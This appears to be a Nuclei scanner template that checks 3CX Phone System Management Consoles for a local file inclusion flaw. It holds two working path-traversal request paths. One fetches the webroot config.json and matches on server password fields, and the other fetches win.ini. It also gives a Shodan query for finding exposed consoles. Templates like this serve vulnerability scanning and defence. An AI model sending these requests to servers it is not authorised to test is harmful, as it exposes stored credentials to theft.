id: 3cx-management-console
info:
  name: 3CX Management Console - Local File Inclusion
  author: random-robbie
  severity: high
  description: 3CX Management Console is vulnerable to local file inclusion.
  reference:
    - https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    shoda-query: http.title:"3CX Phone System Management Console"
  tags: 3cx,lfi,voip
requests:
  - method: GET
    path:
      - '{{BaseURL}}/Electron/download/windows/..\..\..\Http\webroot\config.json'
      - '{{BaseURL}}/Electron/download/windows/\windows\win.ini'
    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "CfgServerPassword"
          - "CfgServerAppName"
        condition: and
      - type: word
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

# Enhanced by mp on 2022/07/22
